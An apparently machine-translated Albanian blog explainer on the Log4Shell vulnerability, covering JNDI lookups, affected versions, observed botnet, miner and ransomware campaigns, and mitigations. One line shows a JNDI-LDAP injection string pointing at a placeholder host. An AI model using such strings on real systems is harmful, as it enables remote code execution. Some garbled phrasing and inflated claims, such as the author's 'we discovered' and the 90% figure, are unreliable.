Përmbajtje[Fshih][Shfaqje]
Në fund të nëntorit 2021, ne zbuluam një kërcënim të madh për sigurinë kibernetike. Ky shfrytëzim potencialisht do të ndikonte në miliona sisteme kompjuterike në mbarë botën.
Ky është një udhëzues mbi dobësinë Log4j dhe se si një e metë e anashkaluar e dizajnit la mbi 90% të shërbimeve kompjuterike në botë të hapura ndaj sulmeve.
Apache Log4j është një mjet logimi me burim të hapur i bazuar në Java i zhvilluar nga Apache Software Foundation. Fillimisht e shkruar nga Ceki Gülcü në 2001, tani është pjesë e Shërbimeve të Logging Apache, një projekt i Fondacionit Apache Software.
Kompanitë në mbarë botën përdorin bibliotekën Log4j për të mundësuar regjistrimin në aplikacionet e tyre. Në fakt, biblioteka Java është kaq e përhapur, saqë mund ta gjeni në aplikacione nga Amazon, Microsoft, Google dhe më shumë.
Vëzhgimi i bibliotekës do të thotë se çdo defekt i mundshëm në kod mund të lërë miliona kompjuterë të hapur për hakerim. Më 24 nëntor 2021, a siguria e reve studiuesi që punonte për Alibaba zbuloi një të metë të tmerrshme.
Dobësia Log4j, e njohur gjithashtu si Log4Shell, ekzistonte pa u vënë re që nga viti 2013. Dobësia lejoi aktorët me qëllim të keq të ekzekutonin kodin në sistemet e prekura që ekzekutonin Log4j. Ajo u zbulua publikisht më 9 dhjetor 2021
Ekspertët e industrisë e quajnë të metën e Log4Shell cenueshmëria më e madhe në kujtesën e fundit.
Në javën pas publikimit të cenueshmërisë, ekipet e sigurisë kibernetike zbuluan miliona sulme. Disa studiues madje vëzhguan një shpejtësi prej mbi njëqind sulmesh në minutë.
Si funksionon kjo gjë?
Për të kuptuar pse Log4Shell është kaq i rrezikshëm, duhet të kuptojmë se çfarë është në gjendje të bëjë.
Dobësia Log4Shell lejon ekzekutimin arbitrar të kodit, që në thelb do të thotë se një sulmues mund të ekzekutojë çdo komandë ose kod në një makinë të synuar.
Si e realizon këtë?
Së pari, ne duhet të kuptojmë se çfarë është JNDI.
Ndërfaqja e emërtimit dhe drejtorisë Java (JNDI) është një shërbim Java që lejon programet Java të zbulojnë dhe të kërkojnë të dhëna dhe burime nëpërmjet një emri. Këto shërbime të drejtorive janë të rëndësishme sepse ato ofrojnë një grup të organizuar regjistrimesh që zhvilluesit t'i referohen lehtësisht kur krijojnë aplikacione.
JNDI mund të përdorë protokolle të ndryshme për të hyrë në një direktori të caktuar. Një nga këto protokolle është Protokolli i Qasjes në Drejtorinë e Lehtë, ose LDAP.
Kur regjistroni një varg, log4j kryen zëvendësime të vargjeve kur ndeshen me shprehje të formës ${prefix:name}
.
Për shembull, Text: ${java:version}
mund të regjistrohet si Tekst: Java version 1.8.0_65. Këto lloj zëvendësimesh janë të zakonshme.
Mund të kemi edhe shprehje si p.sh Text: ${jndi:ldap://example.com/file}
i cili përdor sistemin JNDI për të ngarkuar një objekt Java nga një URL përmes protokollit LDAP.
Kjo ngarkon në mënyrë efektive të dhënat që vijnë nga ajo URL në makinë. Çdo haker i mundshëm mund të presë kodin keqdashës në një URL publike dhe të presë që makinat që përdorin Log4j ta regjistrojnë atë.
Meqenëse përmbajtja e mesazheve të regjistrit përmban të dhëna të kontrolluara nga përdoruesi, hakerët mund të fusin referencat e tyre JNDI që tregojnë për serverët LDAP që ata kontrollojnë. Këta serverë LDAP mund të jenë plot me objekte keqdashëse Java të cilat JNDI mund t'i ekzekutojë përmes dobësisë.
Ajo që e bën këtë më keq është se nuk ka rëndësi nëse aplikacioni është një aplikacion nga ana e serverit apo nga ana e klientit.
Për sa kohë që ka një mënyrë që loggeri të lexojë kodin me qëllim të keq të sulmuesit, aplikacioni është ende i hapur për shfrytëzime.
Kush është prekur?
Dobësia prek të gjitha sistemet dhe shërbimet që përdorin APache Log4j, me versionet 2.0 deri dhe duke përfshirë 2.14.1.
Disa ekspertë të sigurisë këshillojnë se dobësia mund të ndikojë në një numër aplikacionesh që përdorin Java.
E meta u zbulua për herë të parë në lojën video Minecraft në pronësi të Microsoft. Microsoft u ka kërkuar përdoruesve të tyre që të përmirësojnë softuerin e tyre Minecraft të edicionit Java për të parandaluar çdo rrezik.
Jen Easterly, Drejtoresha e Agjencisë së Sigurisë Kibernetike dhe Sigurisë së Infrastrukturës (CISA) thotë se shitësit kanë një përgjegjësi madhore për të parandaluar përdoruesit përfundimtarë nga aktorët keqdashës që shfrytëzojnë këtë dobësi.
“Shitësit duhet gjithashtu të komunikojnë me klientët e tyre për të siguruar që përdoruesit fundorë e dinë se produkti i tyre përmban këtë cenueshmëri dhe duhet t'i japin përparësi përditësimeve të softuerit.
Sulmet thuhet se kanë filluar tashmë. Symantec, një kompani që ofron softuer të sigurisë kibernetike, ka vëzhguar një numër të ndryshëm kërkesash për sulme.
Këtu janë disa shembuj të llojeve të sulmeve që studiuesit kanë zbuluar:
- botnets
Botnet-et janë një rrjet kompjuterash që janë nën kontrollin e një pale të vetme sulmuese. Ato ndihmojnë në kryerjen e sulmeve DDoS, vjedhjen e të dhënave dhe mashtrime të tjera. Studiuesit vëzhguan botnetin Muhstik në skriptet e guaskës të shkarkuar nga shfrytëzimi Log4j.
- XMRig Miner Trojan
XMRig është një minator i kriptomonedhave me burim të hapur që përdor CPU për të minuar tokenin Monero. Kriminelët kibernetikë mund të instalojnë XMRig në pajisjet e njerëzve në mënyrë që ata të përdorin fuqinë e tyre përpunuese pa dijeninë e tyre.
- Khonsari Ransomware
Ransomware i referohet një forme malware të krijuar për të enkriptojnë skedarët në një kompjuter. Sulmuesit më pas mund të kërkojnë pagesë në këmbim të kthimit të aksesit në skedarët e koduar. Studiuesit zbuluan ransomware-in Khonsari në sulmet Log4Shell. Ata synojnë serverët e Windows dhe përdorin kornizën .NET.
Çfarë ndodh më pas?
Ekspertët parashikojnë se mund të duhen muaj apo ndoshta edhe vite për të rregulluar plotësisht kaosin e shkaktuar nga dobësia Log4J.
Ky proces përfshin përditësimin e çdo sistemi të prekur me një version të korrigjuar. Edhe nëse të gjitha këto sisteme janë rregulluar, ekziston ende kërcënimi i prapambetur i mundshëm që hakerët mund të kenë shtuar tashmë në dritaren që serverët ishin të hapur për sulm.
Shumë zgjidhjet dhe zbutjet ekzistojnë për të parandaluar që aplikacionet të shfrytëzohen nga ky bug. Versioni i ri Log4j 2.15.0-rc1 ndryshoi cilësime të ndryshme për të zbutur këtë dobësi.
Të gjitha veçoritë që përdorin JNDI do të çaktivizohen si parazgjedhje dhe kërkimet në distancë janë gjithashtu të kufizuara. Çaktivizimi i veçorisë së kërkimit në konfigurimin tuaj të Log4j do të ndihmojë në uljen e rrezikut të shfrytëzimeve të mundshme.
Jashtë Log4j, ekziston ende nevoja për një plan më të gjerë për të parandaluar shfrytëzimet me burim të hapur.
Më herët në maj, Shtëpia e Bardhë publikoi një ekzekutiv e cila synonte të përmirësonte sigurinë kombëtare kibernetike. Ai përfshinte një dispozitë për një faturë softuerike të materialeve (SBOM) e cila ishte në thelb një dokument formal që përmbante një listë të çdo artikulli të nevojshëm për të ndërtuar aplikacionin.
Kjo përfshin pjesë të tilla si burim të hapur paketat, varësitë dhe API-të e përdorura për zhvillim. Megjithëse ideja e SBOM-ve janë të dobishme për transparencën, a do ta ndihmojë vërtet konsumatorin?
Përmirësimi i varësive mund të jetë shumë i mundimshëm. Kompanitë thjesht mund të zgjedhin të paguajnë çdo gjobë në vend që të rrezikojnë të humbin kohë shtesë për të gjetur paketa alternative. Ndoshta këto SBOM do të jenë të dobishme vetëm nëse ato janë Shtrirja kufizohet më tej.
Përfundim
Çështja Log4j është më shumë se një problem teknik për organizatat.
Drejtuesit e biznesit duhet të jenë të vetëdijshëm për rreziqet e mundshme që mund të ndodhin kur serverët, produktet ose shërbimet e tyre mbështeten në kodin që ata vetë nuk e ruajnë.
Mbështetja në aplikacionet me burim të hapur dhe të palëve të treta shoqërohet gjithmonë me njëfarë rreziku. Kompanitë duhet të konsiderojnë zhvillimin e strategjive për zbutjen e rrezikut përpara se të dalin në dritë kërcënime të reja.
Pjesa më e madhe e internetit mbështetet në softuer me burim të hapur të mirëmbajtur nga mijëra vullnetarë në mbarë botën.
Nëse duam ta mbajmë ueb-in një vend të sigurt, qeveritë dhe korporatat duhet të investojnë në financimin e përpjekjeve me burim të hapur dhe agjencive të sigurisë kibernetike si p.sh. CISA.
Lini një Përgjigju